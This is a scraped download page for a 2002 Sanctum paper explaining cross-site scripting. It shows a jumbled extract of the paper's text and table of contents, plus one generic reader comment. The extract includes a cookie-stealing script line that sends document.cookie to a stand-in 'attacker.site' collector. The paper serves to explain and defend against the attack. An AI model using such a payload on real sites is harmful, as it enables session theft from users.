Cross Site Scripting Explained

the application firewall inspects the data against various HTML tag patterns and Javascript patterns, and if any match, the request is rejected and the …

More PDF Content

Cross Site Scripting Explained, Amit Klein, Sanctum Security Group, June 2002, Table of Contents, Introduction, Full explanation – the CSS technique, Joe%20Hacker, Joe Hacker,

,
<!–
window.open(\"http://www.attacker.site/collect.cgi?cookie=\"+document.cookie), Scope and feasibility, foobar, Variations on the theme, Other ways to perform (traditional) CSS attacks, What went wrong?, Securing a site against CSS attacks, How to check if your site is protected from CSS, alert(document.cookie)
// –>
, How Sanctum\’s AppShield protects against CSS attacks, How Sanctum\’s AppScan scans for CSS vulnerabilities, Conclusion, Links, CERT(R) Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests, Microsoft Security Bulletin MS02-018
Introduction…3
Full explanation – the CSS technique …3
Scope and feasibility…6
Variations on the theme … 6
Other ways to perform (traditional) CSS attacks…7
What went wrong?…7
Securing a site against CSS attacks…8
How to check if your site is protected from CSS …8
How Sanctum’s AppShield protects against CSS attacks …9
How Sanctum’s AppScan scans for CSS vulnerabilities…9
Links…1

Download Cross Site Scripting Explained pdf from crypto.stanford.edu, 10 pages, 192.64KB.
Related Books

One Response to “Cross Site Scripting Explained”

  1. You actually make it seem so easy with your presentation but I find this matter to be
    actually something that I think I would never understand.
    It seems too complicated and very broad for me. I am looking forward for your next post, I’ll try to get the hang of it!

Leave a Reply